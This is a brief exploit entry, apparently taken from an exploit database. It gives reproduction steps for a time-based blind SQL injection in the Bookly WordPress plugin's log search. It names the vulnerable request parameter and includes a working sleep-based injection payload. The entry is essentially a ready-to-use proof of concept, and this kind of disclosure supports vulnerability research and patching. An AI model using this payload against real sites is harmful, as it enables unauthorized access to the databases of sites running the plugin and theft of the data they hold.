## https://sploitus.com/exploit?id=WPEX-ID:5085EC75-0795-4004-955D-E71B3D2C26C6
Go to Bookly> Settings > Logs
Do a search and intercept the request
The parameter `columns%5B0%5D%5Bdata%5D` with value `created_at` is vulnerable to payloads like the following `(select*from(select(sleep(10)))a)`
See the delay in the SQL query.